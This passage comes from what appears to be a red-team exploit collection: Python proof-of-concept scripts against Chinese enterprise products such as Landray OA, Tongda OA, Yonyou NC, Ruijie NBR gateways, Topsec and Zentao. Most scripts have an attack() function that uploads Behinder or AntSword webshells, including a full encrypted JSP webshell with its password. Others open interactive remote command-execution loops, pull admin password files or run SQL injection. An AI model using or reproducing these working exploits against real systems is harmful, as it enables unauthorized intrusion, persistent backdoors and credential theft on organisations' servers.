sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 39 | filename = ''.join(random.sample(string.digits + string.ascii_letters, 5)) + '.jsp' 40 | payload = '/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{0}&name=222'.format(filename) 41 | timeout = 20 42 | headers = { 43 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 44 | 'Content-Range': 'bytes 0-10/20', 45 | } 46 | vurl = urllib.parse.urljoin(url, payload) 47 | data = '{0}'.format(shell) 48 | verify_url = urllib.parse.urljoin(url, '/cas/js/lib/buttons/' + filename) 49 | print('[+] exploit loading ......') 50 | time.sleep(2) 51 | try: 52 | print('[+] 开始上传webshell') 53 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False) 54 | if rep.status_code == 200: 55 | print('[+] 上传成功, 正在检测webshell是否存在?') 56 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 57 | if rep2.status_code == 200: 58 | print('[*] status_code: 200 , 上传成功!') 59 | print('[*] webshell(冰蝎):', verify_url) 60 | print('[*] 密码: rebeyond') 61 | return True 62 | return False 63 | except: 64 | return False -------------------------------------------------------------------------------- /pocs/redteam/landray_oa_admindo_jndiinject_2021.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | result = { 7 | 'name': '蓝凌OA admin.do JNDI远程命令执行', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'about': 'https://mp.weixin.qq.com/s/p1uHhUoUUKi7ESZdWR2nlQ', 11 | } 12 | payload_data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' 13 | timeout = 3 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)', 16 | 'Content-type': 'application/x-www-form-urlencoded', 17 | } 18 | vurl = urllib.parse.urljoin(url, "/sys/ui/extend/varkind/custom.jsp") 19 | try: 20 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=payload_data, verify=False) 21 | if rep.status_code == 200 and re.search('password', rep.text) and re.search("kmss\.properties\.encrypt\.enabled", rep.text): 22 | result['vulnerable'] = True 23 | return result 24 | except: 25 | return result 26 | 27 | def attack(url): 28 | result = { 29 | 'name': '蓝凌OA admin.do JNDI远程命令执行', 30 | 'vulnerable': False, 31 | 'attack': True, 32 | 'about': 'https://mp.weixin.qq.com/s/p1uHhUoUUKi7ESZdWR2nlQ', 33 | } 34 | payload_data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' 35 | timeout = 3 36 | headers = { 37 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)', 38 | 'Content-type': 'application/x-www-form-urlencoded', 39 | } 40 | vurl = urllib.parse.urljoin(url, "/sys/ui/extend/varkind/custom.jsp") 41 | try: 42 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=payload_data, verify=False) 43 | print("[+] 正在获取加密密码......") 44 | password = re.findall("password = .+", rep.text)[0] 45 | print("[*]", password) 46 | print("[+] 请到 https://www.qtool.net/des 进行解密, 默认密钥: kmssAdminKe") 47 | return result 48 | except: 49 | return result -------------------------------------------------------------------------------- /pocs/redteam/landray_oa_treexml_rce_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '蓝凌OA 未授权RCE(2022HVV)', 7 | 'vulnerable': False, 8 | 'attack': True, 9 | 'url': url, 10 | 'about': 'https://mp.weixin.qq.com/s/zV4h5d9DrI7Nm49suSzIWw' 11 | } 12 | cmd = 'whoami' 13 | timeout = 5 14 | headers = { 15 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ", 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | } 18 | payload = '/data/sys-common/treexml.tmpl' 19 | vurl = urllib.parse.urljoin(url, payload) 20 | payload_data = '''s_bean=ruleFormulaValidate&script=try { 21 | String cmd = "%s"; 22 | Process child = Runtime.getRuntime().exec(cmd); 23 | } catch (IOException e) { 24 | System.err.println(e); 25 | }''' % cmd 26 | try: 27 | finger_rep = requests.post(vurl, headers=headers, timeout=timeout, verify=False) 28 | if re.search('参数s_bean不能为空', finger_rep.text): 29 | rep = requests.post(vurl, headers=headers, timeout=timeout, verify=False, data=payload_data) 30 | if re.search('公式运行时返回了空值,所以无法校验返回值类型', rep.text) and rep.status_code == 200: 31 | relsult['vulnerable'] = True 32 | relsult['vurl'] = vurl 33 | return relsult 34 | except: 35 | return relsult 36 | 37 | def attack(url): 38 | timeout = 5 39 | headers = { 40 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ", 41 | 'Content-Type': 'application/x-www-form-urlencoded', 42 | } 43 | payload = '/data/sys-common/treexml.tmpl' 44 | vurl = urllib.parse.urljoin(url, payload) 45 | try: 46 | print('[+] 开始执行命令,输入exit退出') 47 | while True: 48 | cmd = input('[+] 执行命令(无回显) >') 49 | if cmd == 'exit': 50 | break 51 | payload_data = '''s_bean=ruleFormulaValidate&script=try { 52 | String cmd = "%s"; 53 | Process child = Runtime.getRuntime().exec(cmd); 54 | } catch (IOException e) { 55 | System.err.println(e); 56 | }''' % cmd 57 | try: 58 | requests.post(vurl, headers=headers, timeout=timeout, verify=False, data=payload_data) 59 | except: 60 | pass 61 | print('[*] 命令执行完成! 请结合dnslog平台验证是否成功?') 62 | return True 63 | except: 64 | return False -------------------------------------------------------------------------------- /pocs/redteam/mingyu_fileread_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '安恒明御安全网关 任意文件读取(2022HVV)', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | } 11 | timeout = 3 12 | headers = { 13 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ", 14 | 'Content-Type': 'application/x-www-form-urlencoded', 15 | } 16 | payload = '/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd' 17 | vurl = urllib.parse.urljoin(url, payload) 18 | try: 19 | finger_rep = requests.get(url, headers=headers, timeout=timeout, verify=False) 20 | if len(finger_rep.headers['P3P']) > 0: 21 | rep = requests.get(vurl, headers=headers, timeout=timeout, verify=False) 22 | if re.search('root:.*:0:0', rep.text) and rep.status_code == 200: 23 | relsult['vulnerable'] = True 24 | relsult['verify'] = vurl 25 | return relsult 26 | except: 27 | return relsult 28 | -------------------------------------------------------------------------------- /pocs/redteam/prtg_default_pwd_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'PRTG NetWork Monitot default password (后台rce)', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'about': 'https://www.secpulse.com/archives/113566.html', 10 | } 11 | username = 'prtgadmin' 12 | password = 'prtgadmin' 13 | timeout = 3 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | } 18 | vurl = urllib.parse.urljoin(url, '/public/checklogin.htm') 19 | data = f'loginurl=&username={username}&password={password}' 20 | try: 21 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=data, allow_redirects=False, verify=False) 22 | if rep.status_code == 302 and 'OCTOPUS' in rep.headers['Set-Cookie'] and 'PRTG' in rep.headers['Server']: 23 | relsult['vulnerable'] = True 24 | relsult['username'] = username 25 | relsult['password'] = password 26 | return relsult 27 | except: 28 | return relsult -------------------------------------------------------------------------------- /pocs/redteam/ruijie_nbr_fileupload.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib, random, string 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': '锐捷-NBR 任意文件上传(2022HVV)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'url': url, 11 | } 12 | filename = ''.join(random.sample(string.digits + string.ascii_letters, 4)) + '.txt' 13 | shell = ''.join(random.sample(string.digits + string.ascii_letters, 12)) 14 | payload = '/ddi/server/fileupload.php' 15 | timeout = 5 16 | headers = { 17 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36', 18 | 'Content-Type': 'multipart/form-data; boundary=--------801303113', 19 | } 20 | vurl = urllib.parse.urljoin(url, payload) 21 | data = '----------801303113\r\nContent-Disposition: form-data; name="uploadDir"\r\n\r\nupload\r\n----------801303113\r\nContent-Disposition: form-data; name="file";filename="{0}";\r\nContent-Type:text/html;\r\n\r\n{1}\r\n----------801303113--'.format(filename, shell) 22 | verify_url = urllib.parse.urljoin(url, '/ddi/server/upload/' + filename) 23 | try: 24 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False) 25 | if re.search('jsonrpc', rep.text) and re.search(filename, rep.text): 26 | rep = requests.get(verify_url, headers=headers, timeout=timeout, verify=False) 27 | if rep.status_code == 200 and re.search(shell, rep.text): 28 | relsult['vulnerable'] = True 29 | relsult['verify'] = verify_url 30 | return relsult 31 | except: 32 | return relsult 33 | 34 | def attack(url): 35 | print('[+] Exploit loading ......') 36 | filename = ''.join(random.sample(string.digits + string.ascii_letters, 4)) + '.php' 37 | shell = '''''' 63 | payload = '/ddi/server/fileupload.php' 64 | timeout = 20 65 | headers = { 66 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36', 67 | 'Content-Type': 'multipart/form-data; boundary=--------801303113', 68 | } 69 | vurl = urllib.parse.urljoin(url, payload) 70 | data = '----------801303113\r\nContent-Disposition: form-data; name="uploadDir"\r\n\r\nupload\r\n----------801303113\r\nContent-Disposition: form-data; name="file";filename="{0}";\r\nContent-Type:text/html;\r\n\r\n{1}\r\n----------801303113--'.format(filename, shell) 71 | verify_url = urllib.parse.urljoin(url, '/ddi/server/upload/' + filename) 72 | try: 73 | print('[+] 尝试上传冰蝎webshell ') 74 | requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False) 75 | print('[+] 上传完成,正在检查是否上传成功?') 76 | rep = requests.get(verify_url, headers=headers, timeout=timeout, verify=False) 77 | if rep.status_code == 200: 78 | print('[*] status: 200 上传成功!') 79 | print('[*] webshell(冰蝎): ', verify_url) 80 | print('[*] 密码: rebeyond') 81 | return True 82 | print('[-] 未检查到webshell, 手动尝试:', verify_url) 83 | return False 84 | except: 85 | return False 86 | 87 | -------------------------------------------------------------------------------- /pocs/redteam/tongda_oa_qyapp-vote-submit_sqli.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, urllib 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '通达OA sqli-布尔盲注(/mobile/api/qyapp.vote.submit.php)', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | 'method': 'post', 11 | 'position': 'data', 12 | 'param': 'submitData', 13 | } 14 | timeout = 3 15 | headers = { 16 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0', 17 | "Content-Type": "application/x-www-form-urlencoded" 18 | } 19 | payload = '/mobile/api/qyapp.vote.submit.php' 20 | vurl = urllib.parse.urljoin(url, payload) 21 | sqli_data_true = 'submitData={"a":{"vote_type":"1","vote_id":"if((select 995=995),1,2*1e308)","value":"1"}}' 22 | sqli_data_false = 'submitData={"a":{"vote_type":"1","vote_id":"if((select 3353=14451),1,2*1e308)","value":"1"}}' 23 | try: 24 | rep1 = requests.get(vurl, timeout=timeout, verify=False) 25 | if rep1.status_code == 200: 26 | true_rep = requests.post(vurl, headers=headers, data=sqli_data_true, timeout=timeout, verify=False) 27 | false_rep = requests.post(vurl, headers=headers, data=sqli_data_false, timeout=timeout, verify=False) 28 | if len(false_rep.text) > len(true_rep.text) and re.search("请联系管理员", false_rep.text): 29 | relsult['vulnerable'] = True 30 | relsult['vurl'] = vurl 31 | relsult['payload'] = sqli_data_true 32 | return relsult 33 | except: 34 | return relsult -------------------------------------------------------------------------------- /pocs/redteam/tongda_oa_v11-8_apialiphp_fileupload.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re, random, string 3 | import base64,time 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': '通达OA v11.8 api.ali.php任意文件上传漏洞', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'about': 'http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.8%20api.ali.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html', 11 | } 12 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 13 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | filename = "fb6790f7.php" 15 | shell = f' eval(base64_decode($BackData[a])));/*\"}"}\r\n--502f67681799b07e4de6b503655f5cae--' % (bs64_payload) 26 | try: 27 | rep = requests.post(vurl1, headers=headers, timeout=timeout, data=data1.encode('utf-8').decode('latin-1'), verify=False) 28 | if rep.status_code == 200: 29 | rep2 = requests.get(vurl2, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 30 | if rep2.status_code == 200: 31 | verify_rep = requests.get(verify_url, headers=headers, timeout=timeout, data=data1, verify=False) 32 | if verify_rep.status_code == 200 and re.search(randstr1 + randstr2, verify_rep.text): 33 | relsult['vulnerable'] = True 34 | relsult['verify'] = verify_url 35 | return relsult 36 | except: 37 | return relsult 38 | 39 | -------------------------------------------------------------------------------- /pocs/redteam/topsec_management_rce_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re, random, string 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '天融信 上网行为管理RCE(2022HVV)', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | 'about': 'https://mp.weixin.qq.com/s/s_bv4k92Zz-kZFieKN2Qlg', 11 | } 12 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 13 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | shell = randstr1 + randstr2 15 | payload = '/view/IPV6/naborTable/static_convert.php?blocks[0]=|| echo \''+ shell + '\' > /var/www/html/1.txt%0A' 16 | timeout = 3 17 | headers = { 18 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36', 19 | 'Content-Type': 'application/x-www-form-urlencoded', 20 | } 21 | vurl =url + payload 22 | verify_url = urllib.parse.urljoin(url, '/1.txt') 23 | try: 24 | rep = requests.get(vurl, headers=headers, timeout=timeout, verify=False) 25 | if rep.status_code == 200: 26 | verify_rep = requests.get(verify_url, headers=headers, timeout=timeout, verify=False) 27 | if verify_url.status_code == 200 and re.search(randstr1+randstr2, verify_rep.text): 28 | relsult['vulnerable'] = True 29 | relsult['verify'] = verify_url 30 | return relsult 31 | except: 32 | return relsult -------------------------------------------------------------------------------- /pocs/redteam/wangkang_firewall_rce_2021.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, time 3 | import urllib, random, string 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': '网康科技-下一代防火墙前台 RCE(2022HVV)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'url': url, 11 | 'about': 'https://www.jianshu.com/p/88a69b3b17b6', 12 | } 13 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 15 | shell = f'' 16 | filename = 'test.php' 17 | payload = '/directdata/direct/router' 18 | timeout = 3 19 | headers = { 20 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0', 21 | 'Cookie': 'PHPSESSID=e3ctlj1s8b5oblktckrk4anjh7; ys-active_page=s%3A', 22 | } 23 | vurl = urllib.parse.urljoin(url, payload) 24 | payload_json = { 25 | "action": "SSLVPN_Resource", 26 | "method": "deleteImage", 27 | "data": [{ 28 | "data": [f"/var/www/html/b.txt;echo '{shell}'>/var/www/html/{filename}"] 29 | }], 30 | "type": "rpc", 31 | "tid": 17 32 | } 33 | verify_url = urllib.parse.urljoin(url, filename) 34 | try: 35 | rep = requests.post(vurl, headers=headers, timeout=timeout, json=payload_json, verify=False) 36 | if rep.status_code == 200 and re.search('SSLVPN_Resource', rep.text): 37 | 38 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 39 | if rep2.status_code == 200 and re.search(randstr1 + randstr2, rep2.text): 40 | relsult['vulnerable'] = True 41 | relsult['verify'] = verify_url 42 | return relsult 43 | except: 44 | return relsult 45 | 46 | def attack(url): 47 | shell = '''''' 48 | filename = 'test.php' 49 | payload = '/directdata/direct/router' 50 | timeout = 3 51 | headers = { 52 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0', 53 | 'Cookie': 'PHPSESSID=e3ctlj1s8b5oblktckrk4anjh7; ys-active_page=s%3A', 54 | } 55 | vurl = urllib.parse.urljoin(url, payload) 56 | payload_json = { 57 | "action": "SSLVPN_Resource", 58 | "method": "deleteImage", 59 | "data": [{ 60 | "data": [f"/var/www/html/b.txt;echo '{shell}'>/var/www/html/{filename}"] 61 | }], 62 | "type": "rpc", 63 | "tid": 17 64 | } 65 | verify_url = urllib.parse.urljoin(url, filename) 66 | print('[+] Exploit loading ......') 67 | time.sleep(3) 68 | try: 69 | print('[+] 尝试上传蚁剑webshell') 70 | rep = requests.post(vurl, headers=headers, timeout=timeout, json=payload_json, verify=False) 71 | if rep.status_code == 200 and re.search('SSLVPN_Resource', rep.text): 72 | print('[+] 上传完成,正在检测是否上传成功?') 73 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 74 | if rep2.status_code == 200: 75 | print('[*] webshell status: 200, 上传成功!') 76 | print('[*] webshell: ', verify_url) 77 | print('[*] 密码: 1',) 78 | return True 79 | return False 80 | except: 81 | print('[-] error or timeout > ', timeout) 82 | return False -------------------------------------------------------------------------------- /pocs/redteam/yongyou_chanjet_login_sqli.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '畅捷通sql注入登录后台rce', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'attack': False, 10 | } 11 | timeout = 3 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 14 | 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 15 | 'X-Requested-With': 'XMLHttpRequest', 16 | 'DNT': '1', 17 | } 18 | vurl = urllib.parse.urljoin(url, '/GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl') 19 | payload_data = '''username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1''' 20 | try: 21 | rep = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=payload_data) 22 | if rep.status_code == 200 and re.search('\{"RetCode":0\}', rep.text) and 'Set-Cookie' in rep.headers.keys(): 23 | GNSESSIONID = re.findall("GNSESSIONID=(.+)", rep.headers['Set-Cookie'])[0] 24 | relsult['vulnerable'] = True 25 | relsult['vurl'] = vurl 26 | relsult['GNSESSIONID'] = GNSESSIONID 27 | return relsult 28 | except: 29 | return relsult -------------------------------------------------------------------------------- /pocs/redteam/yongyou_nc_file-receive-servlet_fileupload_2021.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re, base64 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '用友 NC >6.5 未授权文件上传漏洞(/servlet/FileReceiveServlet)', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'attack': True, 10 | 'about': 'https://blog.csdn.net/weixin_44578334/article/details/110917053', 11 | } 12 | timeout = 20 13 | headers = { 14 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36", 15 | "Content-Type": "multipart/form-data;", 16 | "Referer": "https://google.com" 17 | } 18 | vurl = urllib.parse.urljoin(url, '/servlet/FileReceiveServlet') 19 | verify_url = urllib.parse.urljoin(url, '/bd3bd.jsp') 20 | # shell: <%out.print("9uY193ZWJ4PCVvdXQucHJpbnQoImFiY2RlZ");%> 21 | # filename: bd3bd.jsp 22 | data = "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAACdAAJRklMRV9OQU1FdAAJYmQzYmQuanNwdAAQVEFSR0VUX0ZJTEVfUEFUSHQAEC4vd2ViYXBwcy9uY193ZWJ4PCVvdXQucHJpbnQoIjl1WTE5M1pXSjRQQ1Z2ZFhRdWNISnBiblFvSW1GaVkyUmxaIik7JT4=" 23 | try: 24 | rep = requests.get(url, headers=headers, verify=False, timeout=timeout) 25 | if rep.status_code == 200: 26 | rep2 = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=base64.b64decode(data)) 27 | if rep2.status_code == 200: 28 | verify_rep = requests.get(verify_url, headers=headers, verify=False, timeout=timeout) 29 | if verify_rep.status_code == 200 and re.search("9uY193ZWJ4PCVvdXQucHJpbnQoImFiY2RlZ", verify_rep.text): 30 | relsult['vulnerable'] = True 31 | relsult['verify'] = verify_url 32 | return relsult 33 | except: 34 | return relsult -------------------------------------------------------------------------------- /pocs/redteam/yongyou_nc_rce_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '用友NC bsh.servlet.BshServlet 命令执行(2022HVV)', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'attack': True, 10 | 'about': 'https://blog.csdn.net/weixin_44146996/article/details/117450104', 11 | } 12 | timeout = 3 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 15 | 'Content-Type': 'application/x-www-form-urlencoded', 16 | } 17 | vurl = urllib.parse.urljoin(url, '/servlet//~ic/bsh.servlet.BshServlet') 18 | try: 19 | rep = requests.get(vurl, headers=headers, verify=False, timeout=timeout) 20 | if rep.status_code == 200 and re.search('BeanShell Test Servle', rep.text): 21 | relsult['vulnerable'] = True 22 | relsult['vurl'] = vurl 23 | return relsult 24 | except: 25 | return relsult 26 | 27 | def attack(url): 28 | timeout = 10 29 | headers = { 30 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 31 | 'Content-Type': 'application/x-www-form-urlencoded', 32 | } 33 | vurl = urllib.parse.urljoin(url, '/servlet//~ic/bsh.servlet.BshServlet') 34 | cmd = '' 35 | print('[+] 尝试执行命令 ......') 36 | try: 37 | print('[+] 开始执行命令,输入exit退出!') 38 | while True: 39 | try: 40 | cmd = input('执行命令 > ') 41 | if cmd == 'exit': 42 | break 43 | data = 'bsh.script=print("$");exec("{0}");print("$");'.format(cmd) 44 | rep = requests.post(vurl, timeout=timeout, verify=False, headers=headers, data=data) 45 | print('[*] Output:', re.findall('\$([^$]+)\$', rep.text)[0]) 46 | except: 47 | print('[-] 执行命令超时,(timeout > {0})'.format(timeout)) 48 | continue 49 | return True 50 | except: 51 | return False -------------------------------------------------------------------------------- /pocs/redteam/yongyou_ufida_ksoa_fileupload_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, time 3 | import urllib, random, string 4 | 5 | def verify(url): 6 | result = { 7 | 'name': 'UFIDA 用友时空KSOA软件 前台文件上传漏洞(2022HVV)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'about': "https://github.com/luck-ying/Library-POC/blob/be26ae4e4c5bdec61dfc485d183826d09fe7e490/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-KSOA-%E5%89%8D%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/yonyou-KSOA-Arbitrary-File-upload.py", 11 | } 12 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 13 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | shell = f'<% out.println("{randstr1}" + "{randstr2}"); %>' 15 | payload = '/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=test.jsp' 16 | timeout = 5 17 | headers = { 18 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36' 19 | } 20 | vurl = urllib.parse.urljoin(url, payload) 21 | try: 22 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=shell, verify=False) 23 | if rep.status_code == 200: 24 | return_path = re.search('(?<=).*(?=)', rep.text).group(0) 25 | verify_url = urllib.parse.urljoin(url, return_path) 26 | time.sleep(1) 27 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 28 | if rep2.status_code == 200 and re.search(randstr1 + randstr2, rep2.text): 29 | result['vulnerable'] = True 30 | result['verify'] = verify_url 31 | return result 32 | except: 33 | return result 34 | 35 | def attack(url): 36 | shell = '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 37 | filename = ''.join(random.sample(string.digits + string.ascii_letters, 8)) + '.jsp' 38 | payload = f'/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename={filename}' 39 | timeout = 5 40 | headers = { 41 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36' 42 | } 43 | vurl = urllib.parse.urljoin(url, payload) 44 | print("[+] exploit loading ......") 45 | try: 46 | time.sleep(2) 47 | print("[+] 开始上传webshell") 48 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=shell, verify=False) 49 | if rep.status_code == 200: 50 | print("[+] 上传成功,正在检查是否存在?") 51 | return_path = re.search('(?<=).*(?=)', rep.text).group(0) 52 | print("[*] 成功获得上传路径,path: ", return_path) 53 | verify_url = urllib.parse.urljoin(url, return_path) 54 | time.sleep(1) 55 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 56 | if rep2.status_code == 200: 57 | print("[*] 上传成功! webshell(冰蝎3): ", verify_url) 58 | print("[*] 密码: rebeyond") 59 | return True 60 | return False 61 | except: 62 | return False -------------------------------------------------------------------------------- /pocs/redteam/zentao_cnvd-2022-42853_sqli.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | import random, hashlib 4 | 5 | def verify(url): 6 | result = { 7 | 'name': 'CNVD-2022-42853: 禅道16.5 SQL注入', 8 | 'vulnerable': False, 9 | 'attack': False, 10 | 'about': "https://www.cnblogs.com/hxlinux/p/16552842.html" 11 | } 12 | str_num = str(random.randint(1000000000, 9999999999)) 13 | str_md5 = hashlib.md5(str_num.encode()).hexdigest() 14 | timeout = 3 15 | vurl = urllib.parse.urljoin(url, '/zentao/user-login.html') 16 | headers = { 17 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 18 | "Content-Type": "application/x-www-form-urlencoded", 19 | "Connection": "close", 20 | "Accept-Encoding": "gzip, deflate", 21 | "Referer": vurl 22 | } 23 | sqli_payload = f"'+and+(select+extractvalue(1,concat(0x7e,(MD5({str_num})),0x7e)))#" 24 | payload_data = f"account=admin{sqli_payload}" 25 | try: 26 | rep = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=payload_data) 27 | if re.search("XPATH syntax error", rep.text) and re.search(str_md5[3:-3], 